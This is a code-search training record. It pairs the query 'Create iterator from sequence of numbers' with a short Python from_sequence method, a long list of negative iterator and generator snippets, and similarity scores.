[ "0.551734", "0.54347765", "0.5407587", "0.53981245", "0.5355724", "0.5321342", "0.5257516", "0.52478385", "0.50181824", "0.5012077", "0.49952018", "0.49402606", "0.493333", "0.493333", "0.4932859", "0.492038", "0.49162006", "0.4866282", "0.4826197", "0.480424", "0.48014733", "0.4791138", "0.47671264", "0.47487557", "0.47135735", "0.46805188", "0.46710217", "0.46284175", "0.46256432", "0.4621728", "0.4619807", "0.4619312", "0.460202", "0.4590993", "0.45563048", "0.45561835", "0.45517552", "0.45474654", "0.45422897", "0.45036384", "0.449852", "0.44630995", "0.44437355", "0.4441935", "0.44233933", "0.4410368", "0.44002774", "0.43972102", "0.43897507", "0.43889523", "0.43795368", "0.43752265", "0.4361252", "0.43604678", "0.43532786", "0.43437228", "0.4341991", "0.4339064", "0.43379503", "0.4330586", "0.43217027", "0.4314954", "0.43109486", "0.43011883", "0.43001214", "0.42874897", "0.42835727", "0.42834854", "0.42780495", "0.4274552", "0.42698976", "0.42678916", "0.42671865", "0.42627653", "0.4261924", "0.4260646", "0.42606208", "0.42505127", "0.42480436", "0.42457104", "0.42379892", "0.42319062", "0.42210644", "0.42205396", "0.42189127", "0.4214401", "0.41930202", "0.41852054", "0.41842112", "0.41827744", "0.4180274", "0.41703707", "0.41619122", "0.41597277", "0.4155464", "0.41472828", "0.41429338", "0.4138269", "0.4137449", "0.4134657" ]
0.76988935
0
f""" Repeatedly apply a function func to input. If more than one argument to func is passed, it iterate over the past n values. It requires at least one argument, if you need to iterate a zero
def iterate(func: Callable[..., T], x: T, *args, index: Index = None):
    func = to_callable(func)
    index = to_index_seq(index)

    if index is None and not args:
        out = _iterate(func, x)
    elif index is None:
        out = _iterate_n(func, (x, *args))
    else:
        if not args:
            out = _iterate_indexed(func, index, x)
        else:
            out = _iterate_indexed_n(func, index, (x, *args))

    return Iter(out)
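The _iterate* helpers, Iter, to_callable, and to_index_seq are internal to the host library, so the dispatch above cannot run on its own. Below is a self-contained sketch of the two plain paths (single seed, and n seeds fed back into func); that the n-seed variant also echoes the seeds before applying func is an assumption made for illustration:

from itertools import islice

def iterate_plain(func, x, *args):
    if not args:
        # Single seed: x, func(x), func(func(x)), ...
        while True:
            yield x
            x = func(x)
    else:
        # n seeds: emit them, then keep applying func to the last n values.
        window = (x, *args)
        yield from window
        while True:
            new = func(*window)
            yield new
            window = window[1:] + (new,)

print(list(islice(iterate_plain(lambda n: 2 * n, 1), 6)))        # [1, 2, 4, 8, 16, 32]
print(list(islice(iterate_plain(lambda a, b: a + b, 1, 1), 7)))  # [1, 1, 2, 3, 5, 8, 13]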
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _call_n(x, f, n, *args, **kwargs):\n return [f(i, x, *args, **kwargs) for i in range(n)]", "def loop(func, n):\n for i in range(n):\n func()", "def repeatfunc(func, n, *args):\n return starmap(func, repeat(args, n))", "def repeat(fun, n):\n for i in range(n):\n yield fun()", "def repeated(f, n, x):\n if n == 1:\n return f(x)\n else:\n return repeated(f,n-1,f(x))", "def make_func_repeater(f, x):\n\n def repeat(i, x=x):\n if i == 0:\n return x\n else:\n return repeat(i-1, f(x))\n return repeat", "def iterate(func, x):\n while True:\n x = func(x)\n yield x", "def repeatedly(func, /, *args, **kwargs):\n func = to_callable(func)\n try:\n while True:\n yield func(*args, **kwargs)\n except StopIteration as e:\n yield from stop_seq(e)", "def main(n):\n return sum(f(i) for i in xrange(n))", "def repeat(self, fn, *args, **kwargs):\n return repeat_n_times(self.n, fn, *args, **kwargs)", "def repeat_n_times(n, fn, *args, **kwargs):\n if args:\n my_args = _transpose_list_of_lists(\n [_maybe_repeat(arg, n) for arg in args])\n else:\n my_args = [[] for _ in range(n)]\n my_kwargs = [{} for _ in range(n)]\n for k, v in six.iteritems(kwargs):\n vals = _maybe_repeat(v, n)\n for i in range(n):\n my_kwargs[i][k] = vals[i]\n\n # construct lists of functions\n fns = _maybe_repeat(fn, n)\n outputs = [fns[i](*my_args[i], **my_kwargs[i]) for i in range(n)]\n if isinstance(outputs[0], tuple):\n outputs = list(zip(*outputs))\n outputs = tuple([list(o) for o in outputs])\n return outputs", "def iterate(f, x):\n while True:\n yield x\n x = f(x)", "def cycle(f1, f2, f3):\n def how_many(n):\n def what(x):\n if n >= 1:\n x = f1(x)\n if n >= 2:\n x = f2(x)\n if n >= 3:\n x = f3(x)\n if n > 3:\n return how_many(n - 3)(x)\n else:\n return x\n return what\n return how_many", "def benchmarkNFunc(iter, ns):\n def decorator(func):\n for n in ns:\n benchmarkFuncs.append((func, (n,), iter))\n return func\n return decorator", "def repeatfunc(func, times=None, *args):\n if times is None:\n return starmap(func, repeat(args))\n return starmap(func, repeat(args, times))", "def repeatfunc(func, times=None, *args):\n if times is None:\n return starmap(func, repeat(args))\n return starmap(func, repeat(args, times))", "def repeatfunc(cls, func, times=None, *args):\n if times is None:\n return starmap(func, repeat(args))\n return starmap(func, repeat(args, times))", "def repeat_func(func, *args, **kwargs):\n if kwargs:\n return starmap(lambda args, kwargs: func(*args, **kwargs),\n repeat((args, kwargs))\n )\n else:\n return starmap(func, repeat(args))", "def repeated_applications(f, n):\n\th = (f for i in range(n))\n\treturn itertools.reduce(combine, h)", "def _fold_loop(cls, f, agg, next):\n\n while next is not None:\n (val, next) = next\n agg = f(val, agg)\n return agg", "def loop(func):\n def wrapper(*a, **b):\n while True:\n func(*a, **b)\n return wrapper", "def times(self, fn):\n for i in range(0, self._):\n fn()\n return self", "def filtern(func: Callable, iterable: Iterable):\n return next(filter(func, iterable))", "def compute_over_actions(f, *args):\n\n '''\n # show the middle results\n for a in zip(*args):\n print(\"a:\", a)\n r = f(*a)\n print(\"r:\", r)\n '''\n\n return sum(f(*a) for a in zip(*args))", "def apply_along_1_nb(a, apply_func_nb, *args):\n out = np.empty_like(a, dtype=np.float_)\n for i in range(a.shape[0]):\n out[i, :] = apply_func_nb(i, a[i, :], *args)\n return out", "def _apply_func(data, func, num_rows, base_row_index=0, increment=False):\n row = list(data[base_row_index])\n curr_index = base_row_index\n 
for _ in range(num_rows):\n data.append(func(row))\n if increment:\n curr_index += 1\n row = list(data[curr_index])\n return data", "def g_iter(n):\n \"*** YOUR CODE HERE ***\"\n vals = [1, 2, 3]\n if n <= 3:\n return vals[n-1]\n for i in range(n - 3):\n new_val = 3 * vals[0] + 2 * vals[1] + 1 * vals[2]\n vals = vals[1:] + [new_val]\n return vals[-1]", "def n_ary(n, f):\n if n < 0:\n raise ValueError(\"First argument to n_ary must be a non-negative integer\")\n\n args1, args2 = generate_args(inspect.getfullargspec(f), n)\n\n return eval(\"lambda \" + args1 + \": f(\" + args2 + \")\", {\"f\": f})", "def lift(f: Callable[..., Data]) -> LiftedFunc:\n def inner(*args: Result) -> Result:\n out = []\n for args1 in itertools.product(*args):\n val = f(*args1)\n out.append(val)\n return out\n return inner", "def body(i, *args):\n del args\n fn_result = fn(ctx, iterator.get_next())\n flat_last_step_outputs = nest.flatten(ctx.last_step_outputs)\n with ops.control_dependencies([fn_result]):\n return [i + 1] + flat_last_step_outputs", "def n_ary(f):\n def n_ary_fn(x, *args):\n return x if not args else f(x, n_ary_fn(*args))\n return n_ary_fn", "def apply_function(f, args):\n if len(signature(f).parameters) == len(args):\n func = curry(f)\n for arg_value in args:\n func = func(arg_value)\n return func()\n else:\n raise Exception(\"the number of function's parameter is not matched args, len(args): \", len(args))", "def power_unary(x, n, f):\n return reduce(lambda g, h: lambda x: g(h(x)), itertools.repeat(f, n))(x)", "def stop_after_n_iter(n_iteration: int):\n return lambda iteration, **kwargs: iteration>=n_iteration", "def applyToEach(L,f):\n for i in range(len(L)):\n L[i] = f(L[i])", "def run_trials(f, n):\n\tfor value in range(2, 3):\n\t\tprint(\"{:>3}:{:>5}\".format(value, f(n, value)))", "def fn(n):\n if n == 0: return 1\n return sum(fn(i)*fn(n-i-1) for i in range(n))", "def basis_fns(n=0):\n return lambda x: np.sum(x ** (n+1), axis=1)", "def progression(first_item:int, amount:int,func):\n item = first_item\n count = 0\n stop = False\n while count < amount and not stop:\n stop = yield item\n item = func(item)\n count += 1", "def _iterate_over_factors(self, func, args):\n # TODO The user may prefer to provide the arguments as lists and receive them as\n # TODO lists, as this may be the form in which they are available. 
This should\n # TODO be allowed, rather than packing and unpacking them repeatedly.\n args_list, numerical_args = self._validate_and_prepare_args_for_iteration(args)\n\n out = [\n self._get_method(self.factors[i], func, args_list[i], numerical_args)\n for i in range(len(self.factors))\n ]\n if self._pool_outputs:\n return self._pool_outputs_from_function(out)\n return out", "def filter_n(function, iterable, **kwargs) -> iter:\n n_pass, n_fail = 0, 0\n\n for item in iterable:\n if function(item, **kwargs):\n yield item\n n_pass += 1\n else:\n n_fail += 1\n\n LOGGER.info(\"Filter %s: output %s rows (dropped %s rows)\", function.__name__, n_pass, n_fail)", "def iterate(self, batch_size=8, func=None):\n raise NotImplementedError()", "def n_ary(f):\n def n_ary_f(x,*args):\n return x if not args else f(x,n_ary_f(*args))\n return n_ary_f", "def foreach(func, iterable):\n\n\tfor x in iterable:\n\t\tfunc(x)", "def repeat_every(repeats=5, every=2):\n\n def repeat_wrapper(func):\n @functools.wraps(func)\n def func_wrapper(*args, **kwargs):\n for _ in range(repeats):\n value = func(*args, **kwargs)\n if value:\n return value\n time.sleep(every)\n\n return func_wrapper\n\n return repeat_wrapper", "def for_loop(num_iters, body, initial_args):\n for i in range(num_iters):\n if i == 0:\n outputs = body(*initial_args)\n else:\n outputs = body(*outputs)\n return outputs", "def n_ary(f):\n #def n_ary_f(x, *args):\n #if len(args) == 0:\n #return x\n #return f(x,n_ary_f(args[0],*args[1:]))\n def n_ary_f(x, *args):\n return x if not args else f(x,n_ary_f(*args))\n return n_ary_f", "def apply(self, func, *args):\n pass", "def iterate(iterator, n):\n # throw away n-1 elements\n for index in range(1, n):\n next(iterator, None)\n\n return next(iterator, None)", "def n_ary(func):\n def wrapper(x, *args):\n return x if not args else func(x, wrapper(*args))\n return wrapper", "def cycle(f1, f2, f3):\n \"*** YOUR CODE HERE ***\"\n def f_n(n):\n def f_x(x):\n i = 0\n while i < n:\n if i%3 == 0:\n x = f1(x)\n elif i%3 == 1:\n x = f2(x)\n else:\n x = f3(x)\n i += 1\n return x\n return f_x\n return f_n", "def fold(iterable, func, base):\n acc = base\n for element in iterable:\n acc = func(acc, element)\n return acc", "def after(n):\n\n def decorate(fn):\n i = 0\n\n @wraps(fn)\n def wrapped(*args, **kwargs):\n nonlocal i\n i += 1\n if i >= n:\n return fn(*args, **kwargs)\n\n return wrapped\n\n return decorate", "def repeat(num_times):\n\n def decorator_repeat(func):\n \"\"\"\n defines wrapper_repeat(*args, **kwargs)\n\n :returns: wrapper_repeat\n \"\"\"\n\n @functools.wraps(func)\n def wrapper_repeat(*args, **kwargs):\n \"\"\"\n func(*args, **kwargs) num_times\n\n :return: last return value\n \"\"\"\n for _ in range(num_times):\n value = func(*args, **kwargs)\n return value\n\n return wrapper_repeat\n\n return decorator_repeat", "def each(self, func):\n\n for i in self._:\n func(i)\n return self", "def benchmarkFunc(iter, args=()):\n def decorator(func):\n benchmarkFuncs.append((func, args, iter))\n return func\n return decorator", "def test_func(f, n):\n t = [[1]] * n\n\n start = etime()\n f(t, [])\n end = etime()\n elapsed = end - start\n return elapsed", "def apply_ntimes(func, n, args, verbose=True, timeout=None):\n pool = multiprocessing.Pool()\n\n multiple_results = [pool.apply_async(func, args) for _ in range(n)]\n\n pool.close()\n \n return [res.get(timeout) for res in tqdm(multiple_results, desc='# apply_ntimes', disable = True)]", "def sequential(self, func, args_dict=None):\n for uri, cf in self._cfs.items():\n 
args = self._process_args_dict(cf, uri, args_dict)\n func(*args)", "def take(iterable, n):\n\n def taking(iterable_):\n for i, e in enumerate(iterable_):\n if i < n:\n yield e\n\n return taking(iterable)", "def sliced_fun(f, n_slices):\n\n def sliced_f(sliced_inputs, non_sliced_inputs=None):\n if non_sliced_inputs is None:\n non_sliced_inputs = []\n if isinstance(non_sliced_inputs, tuple):\n non_sliced_inputs = list(non_sliced_inputs)\n n_paths = len(sliced_inputs[0])\n slice_size = max(1, n_paths // n_slices)\n ret_vals = None\n for start in range(0, n_paths, slice_size):\n inputs_slice = [v[start:start + slice_size] for v in sliced_inputs]\n slice_ret_vals = f(*(inputs_slice + non_sliced_inputs))\n if not isinstance(slice_ret_vals, (tuple, list)):\n slice_ret_vals_as_list = [slice_ret_vals]\n else:\n slice_ret_vals_as_list = slice_ret_vals\n scaled_ret_vals = [\n np.asarray(v) * len(inputs_slice[0])\n for v in slice_ret_vals_as_list\n ]\n if ret_vals is None:\n ret_vals = scaled_ret_vals\n else:\n ret_vals = [x + y for x, y in zip(ret_vals, scaled_ret_vals)]\n ret_vals = [v / n_paths for v in ret_vals]\n if not isinstance(slice_ret_vals, (tuple, list)):\n ret_vals = ret_vals[0]\n elif isinstance(slice_ret_vals, tuple):\n ret_vals = tuple(ret_vals)\n return ret_vals\n\n return sliced_f", "def down_to(self, n, fn):\n for i in range(self._, n, -1):\n fn(i)\n return self", "def timedcalls(n, fn, *args):\n if isinstance(n, int):\n times = [timedcall(fn, *args)[0] for _ in xrange(n)]\n\n elif isinstance(n, float):\n timer, times = 0.0, []\n while timer < n:\n times.append(timedcall(fn, *args)[0])\n timer += times[-1]\n\n return min(times), average(times), max(times)", "def take(n):\n def _take_xducer(step):\n outer_vars = {\"counter\": n}\n def _take_step(r=Missing, x=Missing):\n if r is Missing: return step()\n if x is Missing:\n return step(r)\n n = outer_vars[\"counter\"]\n outer_vars[\"counter\"] -= 1\n r = step(r, x) if n > 0 else r\n return ensure_reduced(r) if outer_vars[\"counter\"] <= 0 else r\n return _take_step\n return _take_xducer", "def measure_func(func, args, number=1):\n f = partial(func, *args) # pylint: disable=W0142\n while True:\n start = timer()\n r = timeit.repeat(f, number=number, repeat=1)\n if timer() - start > 1: # at least 1 second per measurement\n break\n number *= 2\n return min(r + timeit.repeat(f, number=number, repeat=2)) / number", "def apply(self, func, *args, **kwargs):\n pass", "def scanr(func, start, itr):\n if not callable(func):\n raise TypeError(\"First argument to scanr must be callable\")\n itr = iter(itr)\n \n return _scanr(func, start, itr)", "def repeat(seq, n):\n for e in seq:\n for _ in range(n):\n yield e", "def postorderIterArgs(limit=sys.getrecursionlimit(), testFn=isIterable, *args):\n if limit:\n last = None\n for arg in args:\n if testFn(arg):\n for a in postorderIterArgs(limit - 1, testFn, *arg):\n yield a\n else:\n if last:\n yield last\n last = arg\n if last:\n yield last\n else:\n for arg in args:\n yield arg", "def apply_along_0_nb(a, apply_func_nb, *args):\n out = np.empty_like(a, dtype=np.float_)\n for col in range(a.shape[1]):\n out[:, col] = apply_func_nb(col, a[:, col], *args)\n return out", "def incr(n=1):\n for i in xrange(n):\n pulse_hi(INCR)", "def map_multi_args(self, func, iterable, chunksize=None):\n assert self._state == RUN\n return self.map_async(one_to_many(func), iterable, chunksize).get()", "def process_list(_func, iterator, *args, **kwargs):\n return [_func(i, *args, **kwargs) for i in iterator]", "def 
take_nth(n):\n def _take_nth_xducer(step):\n outer = {\"idx\": 0}\n def _take_nth_step(r=Missing, x=Missing):\n if r is Missing: return step()\n if x is Missing:\n return step(r)\n if outer[\"idx\"] % n:\n outer[\"idx\"] += 1\n return r\n else:\n outer[\"idx\"] += 1\n return step(r, x)\n return _take_nth_step\n return _take_nth_xducer", "def foldr(func, start, itr):\n return _foldr(func, start, iter(itr))", "def expanding_apply_nb(a, apply_func_nb, *args):\n return rolling_apply_nb(a, a.shape[0], apply_func_nb, *args)", "def eager_map(func, iterable):\n for _ in map(func, iterable):\n continue", "def _pipe_and_accumulate(val, fns):\n for fn in fns:\n val = fn(val)\n yield val", "def test_lambda(n):\n for i in range(n):\n yield lambda : i", "def apply(self, *input_):\n result = None\n for function in reversed(self._functions):\n if result is None:\n result = function(*input_)\n else:\n result = function(result)\n return result", "def map(iterable, function):\n for x in iterable:\n yield function(x)", "def foreach(function):\n return partial(map, function)", "def Moments(func, n, limits=(0, np.inf), args={}):\n if args=={}:\n _func = lambda x: func(x)\n else:\n _func = lambda x: func(x, **args)\n if type(n) == type([]):\n result = [i for i in n]\n for i in n:\n function = lambda x: _func(x)*x**i\n result[i] = quad(function, limits[0], limits[1])\n else: \n function = lambda x: _func(x)*x**n\n result = quad(function, limits[0], limits[1])\n return result", "def wrapper(self, nth):\n\n if isinstance(nth, int):\n return function(self, nth)\n \n else:\n raise TypeError('Invalid input! Argument must be integer.')", "def wrapper(self, nth):\n\n if isinstance(nth, int):\n return function(self, nth)\n \n else:\n raise TypeError('Invalid input! Argument must be integer.')", "def sum_f(f, xs):\n sum = 0\n for x in xs:\n sum += f(x)\n return sum", "def ireduce(f, it):\n acc = it.next()\n yield acc\n for x in it:\n acc = f(acc, x)\n yield acc", "def repeat(iterable, count=None):\n if count is None:\n while True:\n for sample in iterable:\n yield sample\n else:\n for i in range(count):\n for sample in iterable:\n yield sample", "def reconstruction(B, N):\n\n def _(f):\n return lambda *x: sum(f[i] * B(i)(*x) for i in range(N))\n\n return _", "def generate_numba_apply_func(\n func: Callable[..., Scalar],\n nopython: bool,\n nogil: bool,\n parallel: bool,\n):\n numba_func = jit_user_function(func)\n if TYPE_CHECKING:\n import numba\n else:\n numba = import_optional_dependency(\"numba\")\n\n @numba.jit(nopython=nopython, nogil=nogil, parallel=parallel)\n def roll_apply(\n values: np.ndarray,\n begin: np.ndarray,\n end: np.ndarray,\n minimum_periods: int,\n *args: Any,\n ) -> np.ndarray:\n result = np.empty(len(begin))\n for i in numba.prange(len(result)):\n start = begin[i]\n stop = end[i]\n window = values[start:stop]\n count_nan = np.sum(np.isnan(window))\n if len(window) - count_nan >= minimum_periods:\n result[i] = numba_func(window, *args)\n else:\n result[i] = np.nan\n return result\n\n return roll_apply", "def mystery1(input_val):\n global counter\n for index in range(input_val):\n for dummy_index in range(5):\n counter += 1", "def sequence(f, lst: list) -> list:\n ret = []\n for ele in lst:\n ret.append(f(ele))\n return ret", "def merge_n_reduce(\n function: typing.Callable, arity: int, data: list\n) -> typing.Any:\n while len(data) > 1:\n data_chunk = data[:arity]\n data = data[arity:]\n data.append(function(*data_chunk))\n return data[0]", "def wrapper_fn(*args, **kwargs):\n\n if 
__enveloop_number_of_loops__[fn.__name__] > 0:\n __enveloop_number_of_loops__[fn.__name__] -= 1\n return fn(*args, **kwargs)\n else:\n del __enveloop_number_of_loops__[fn.__name__]\n if callback:\n return callback(*args, **kwargs)", "def make_incrementor(n):\n return lambda x: x + n", "def lookahead(n, iterable):\n for value in islice(copy.copy(iterable), n, None):\n return value\n raise IndexError(n)", "def chained(func):\n def wrapper(*args, **kwargs):\n for xs in func(*args, **kwargs):\n for x in xs:\n yield x\n return wrapper", "def apply(cls, func):\n raise NotImplementedError", "def multi_apply(func, *args, **kwargs):\n\n pfunc = partial(func, **kwargs) if kwargs else func\n map_results = map(pfunc, *args)\n return tuple(map(list, zip(*map_results)))", "def iterate_until_stable( width, values, count_fn=day11_1_fn, abandon_threshold=4): \n changed=True # just to be able to enter the loop\n while changed:\n changed, values = apply_rules( width, values, count_fn, abandon_threshold )\n return values" ]
[ "0.7455248", "0.7375146", "0.7370228", "0.71860796", "0.7169171", "0.69895", "0.6812954", "0.6778386", "0.675432", "0.6688753", "0.6684521", "0.665017", "0.6537547", "0.64917755", "0.63972217", "0.63972217", "0.6348087", "0.62363607", "0.62081873", "0.6142448", "0.6037471", "0.60039353", "0.597098", "0.5969384", "0.59461665", "0.590863", "0.5859062", "0.58571064", "0.5842316", "0.58056796", "0.5788962", "0.57800955", "0.5777089", "0.57719207", "0.57673883", "0.57585764", "0.57428217", "0.57390743", "0.5723558", "0.57213277", "0.5703385", "0.5701029", "0.5678435", "0.5675957", "0.5672142", "0.5662256", "0.5652795", "0.5652459", "0.5636568", "0.5618811", "0.56085277", "0.5602516", "0.55933625", "0.5584448", "0.5572572", "0.5569556", "0.5566382", "0.5565028", "0.55531406", "0.5533626", "0.5531047", "0.5511404", "0.5507391", "0.55026484", "0.54972875", "0.54804516", "0.54783183", "0.54725564", "0.5467122", "0.5465325", "0.54645294", "0.54635704", "0.54512066", "0.54445046", "0.544408", "0.5419225", "0.5414741", "0.54116106", "0.54060036", "0.5404731", "0.540067", "0.53986883", "0.539856", "0.5394788", "0.5394788", "0.53788567", "0.5370853", "0.5369334", "0.53677297", "0.53664565", "0.5366234", "0.5365993", "0.53630966", "0.53538615", "0.53505456", "0.53471565", "0.53427124", "0.5317019", "0.5316719", "0.53159386" ]
0.6898225
6
Create iterator from sequence of numbers.
def from_sequence(self, seq):
    return Iter(self._from_sequence(seq))
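A minimal runnable sketch of how from_sequence could be exercised; the Iter wrapper and the _from_sequence generator below are stand-ins inferred from the document, not part of the original code.

# Hypothetical stand-ins so the sketch runs on its own: Iter wraps an
# iterator, and _from_sequence yields each element of the given sequence.
class Iter:
    def __init__(self, it):
        self._it = iter(it)

    def __iter__(self):
        return self._it

def _from_sequence(seq):
    for x in seq:
        yield x

print(list(Iter(_from_sequence([1, 2, 3]))))  # [1, 2, 3]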
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def numeric_sequence_iteration(self) -> global___Statement.Iteration.NumericSequenceIteration:", "def simple_seq(seq):\n for i in seq:\n yield i", "def numbers():\n for number in range(1, 76):\n yield number", "def __iter__(self):\r\n \r\n return iter(self._by_number)", "def __iter__(self):\n for x in self.seq: yield x", "def integers():\n i = 1\n while True:\n yield i\n i = i + 1", "def integers():\n i = 1\n while True:\n yield i\n i = i + 1", "def __iter__(self):\n return iter(range(1, self.size() + 1))", "def get_numbers(sequence):\r\n\r\n new_list = []\r\n for element in sequence:\r\n if isinstance(element, numbers.Number) == True:\r\n new_list.append(element)\r\n\r\n return new_list", "def seq_ints(n, start=0, step=1):\n return list(range(start, start + n*abs(step), step))", "async def a_enumerate(seq, start=0):\n i = start\n async for val in seq:\n yield i, val\n i += 1", "def FastaM10Iterator(handle, seq_count=...):\n ...", "def uniform_iterator(sequence):\n\n if isinstance(sequence, abc.Mapping):\n return six.iteritems(sequence)\n else:\n return enumerate(sequence)", "def fromSequence(self, sequence):\n for aVal, bVal in sequence:\n self.add(aVal, bVal)\n\n return self", "def iter_sequence_infinite(seq):\n while True:\n for item in seq:\n yield item", "def __iter__(cls):\n return iter(cls.__by_number.values())", "def xrange1(value):\n try:\n i = int(value)\n return [x+1 for x in xrange(i)]\n except:\n return []", "def xrange(*args):\n len_args = len(args)\n if len_args == 1:\n stop = int(args[0])\n start = 0\n step = 1\n elif len_args == 2:\n start = int(args[0])\n stop = int(args[1])\n step = 1\n elif len_args == 3:\n start = int(args[0])\n stop = int(args[1])\n step = int(args[2])\n else:\n raise TypeError(\"xrange() requires 1-3 int arguments\")\n if step < 0:\n bcmp = operator.gt\n elif step > 0:\n bcmp = operator.lt\n else:\n raise StopIteration\n act = int(start)\n while bcmp(act, stop):\n yield act\n act += step", "async def aenumerate(asequence, start=0):\n n = start\n async for elem in asequence:\n yield n, elem\n n += 1", "def __iter__(self) -> Generator:\r\n yield from self.sequence", "def digit_generator(N=1_000_000):\n i = 0\n number = 1\n while N > i:\n for _i in str(number):\n yield _i\n i += 1\n number += 1", "def __init__(self, generator, to_hashable=lambda x: x):\n self.index_to_result = []\n self.hashable_to_index = dict()\n for i, result in enumerate(generator):\n self.index_to_result.append(result)\n hashable = to_hashable(result)\n if hashable in self.hashable_to_index:\n break\n else:\n self.hashable_to_index[hashable] = i\n else:\n raise Exception(\"generator terminated without repeat\")\n self.cycle_begin = self.hashable_to_index[hashable]\n self.cycle_end = i\n self.cycle_length = self.cycle_end - self.cycle_begin\n\n self.first_repeated_result = self.index_to_result[self.cycle_begin]\n self.second_repeated_result = self.index_to_result[self.cycle_end]", "def __init__(self, seq, start=0, header_lines=[], comments=[], end=[], load_headers=True, **kwargs):\n\n self.iter = iter(seq)\n self.start = start if (start or start == 0) else 1\n self.header_lines = header_lines if isinstance(header_lines, (tuple, list)) else [int(e) for e in\n header_lines.split(',') if e]\n self.comment_lines = comments\n self.end = end\n\n self.load_headers = load_headers\n\n self.headers = []\n self.comments = []\n\n int(self.start) # Throw error if it is not an int", "def __iter__(self) -> Iterator:\n if self.ndim > 1:\n for i in range(len(self)):\n yield self[i]\n else:\n # 
convert in chunks of 10k for efficiency\n data = self.asi8\n length = len(self)\n chunksize = 10000\n chunks = (length // chunksize) + 1\n\n for i in range(chunks):\n start_i = i * chunksize\n end_i = min((i + 1) * chunksize, length)\n converted = ints_to_pydatetime(\n data[start_i:end_i],\n tz=self.tz,\n box=\"timestamp\",\n reso=self._creso,\n )\n yield from converted", "def __init__(self, iterator):\n self.iterator = []\n while iterator.hasNext():\n self.iterator.append(iterator.next())", "def numbers(num):\n r = []\n for i in range(num):\n d = len(r)\n r = [1 if i == 0 or i == d else r[i-1]+r[i] for i in range(d+1)]\n yield r", "def enumerate_list(seq):\n return zip(xrange(len(seq)), seq)", "def __init__(self, iterator):\n self.iterator = iterator\n self.peek_num = None", "def __iter__(self):\n pass\n\n # TODO: range, based on iterator", "def iter_nums():\n saved = dict()\n\n def get_or_zero(x, y):\n \"\"\" Get the value at (x, y) in the cache, or return 0 \"\"\"\n coord = (x, y)\n if coord in saved:\n return saved[coord]\n else:\n return 0\n\n for coord in iter_coords():\n x, y = coord\n if coord == (0, 0):\n val = 1\n else:\n val = 0\n val += get_or_zero(x-1, y-1)\n val += get_or_zero(x, y-1)\n val += get_or_zero(x+1, y-1)\n val += get_or_zero(x-1, y)\n val += get_or_zero(x+1, y)\n val += get_or_zero(x-1, y+1)\n val += get_or_zero(x, y+1)\n val += get_or_zero(x+1, y+1)\n\n saved[coord] = val\n\n yield val", "def xrange0(value):\n try:\n i = int(value)\n return list(xrange(i))\n except:\n return []", "def gen_sequence(a, b, c):\n i = 1\n while True:\n yield a * i**2 + b * i + c\n i += 1", "def intersperse(value, seq):\n seq = iter(seq)\n\n try:\n yield next(seq)\n except StopIteration:\n return\n\n for item in seq:\n yield value\n yield item", "def __iter__(self):\n return self.new_generator()", "def __init__(self, nums):\n self.nums, self.iter = nums, 0", "def __init__(self, iterator):\n self.iterator = iterator\n self.has_next = False\n self.next_val = None\n if self.iterator.hasNext():\n self.has_next = True\n self.next_val = self.iterator.next()", "def __iter__(self):\n for i in range(self.n):\n yield self.get(i, i + 1)", "def __iter__(self):\n # type: () -> Iterator[Any]\n return iter(self[index] for index in range(len(self)))", "def _digits(self, num):\n digits = str(num)\n for digit in digits:\n yield int(digit)", "def __init__(self, sequence):\n self._seq = sequence # Copy of the given data.\n # Reference to the underlying data, will increment to 0 on first call\n # to next element.\n self._k = -1", "def primeset(source: Iterable[int]) -> Iterator[int]:\n for i in source:\n if prime(i):\n yield i", "def random_number_generator(a: int, b: int) -> Iterator[int]:\n numbers = [val for val in range(a, b)]\n\n while numbers:\n yield numbers.pop(random.randint(0, len(numbers) - 1))", "def renumber():\n\n counter = itertools.count(1)\n while True:\n yield 's%s'%counter.next()", "def codon_iter(seq):\n if len(seq) % 3:\n raise ValueError(\"the sequence length are not devided by 3\")\n return string_to_kmers(seq, 3)", "def iter_n(sequence: Sequence[T], n: int) -> List[T]:\n\t\n\tfor i in range(len(sequence) - (n-1)):\n\t\tyield sequence[i:i+n]", "def int_to_seq(i):\n\ts = []\n\tprime = xprimes()\n\twhile i != 1:\n\t\ts.append(0)\n\t\tp = next(prime)\n\t\twhile i % p == 0:\n\t\t\ts[-1] += 1\n\t\t\ti /= p\n\treturn s", "def fromiter(cls, args, **assumptions):\n return cls(*tuple(args), **assumptions)", "def vytvorit_generator():\n mylist = range(3)\n print 'mylist = ', mylist\n for 
element in mylist:\n yield element", "def __iter__(self):\n for x in self.innings:\n yield x", "def simple_range(limit):\n i = 0\n while i < limit:\n yield i\n i += 1", "def id_generator():\n start_value = 0\n while True:\n yield start_value\n start_value += 1", "def mxrange(lr):\n if len(lr):\n yield ()\n else:\n # it can work with single numbers\n index = lr[0]\n if isinstance(index, int):\n index = [index]\n for a in range(*index):\n for b in mxrange(lr[1:]):\n yield tuple([a] + list(b))", "def e_seq():\n yield 2;\n for n in count(2, 2):\n yield 1\n yield n\n yield 1", "def __iter__(self) -> Iterator[Range]:\n return iter(self._ranges)", "def iseq(start=0, stop=None, inc=1):\n if stop is None: # allow isequence(3) to be 0, 1, 2, 3\n # take 1st arg as stop, start as 0, and inc=1\n stop = start; start = 0; inc = 1\n return range(start, stop+inc, inc)", "def concrete(seq):\n if isinstance(seq, Iterator):\n seq = list(seq)\n if isinstance(seq, (tuple, list)):\n seq = list(map(concrete, seq))\n return seq", "def triangle_numbers():\n counter, tri_number = 1, 1\n while True:\n yield tri_number\n counter += 1\n tri_number += counter", "def __iter__(self):\n return iter(self.to_list())", "def _generate_iterator(self) -> Iterable:\n params: List[Tensor] = []\n for angle_range in self._ranges:\n lin_space: Tensor = linspace(angle_range[0], angle_range[1], steps=self._num_steps)\n params.append(lin_space)\n power: int\n dims: int\n for i in range(0, self._num_params):\n power = len(self._ranges) - 1 - i\n dims = i\n params[i] = params[i].repeat_interleave(self._num_steps ** power)\n params[i] = params[i].broadcast_to((self._num_steps ** dims, self._num_steps ** (power + 1))).flatten()\n return zip(*params)", "def take(n, seq):\n seq = iter(seq)\n result = []\n try:\n for i in range(n):\n result.append(next(seq))\n except StopIteration:\n pass\n return result", "def repeat(seq, n):\n for e in seq:\n for _ in range(n):\n yield e", "def generator(factor: int, test: typing.Callable[[int], bool],\n start: int) -> typing.Iterator[int]:\n value = start\n while True:\n value = (value * factor) % 2147483647\n if test(value):\n yield value", "def to_int(a):\n i = 0\n while a:\n i += 1\n a = a.next\n return i", "def 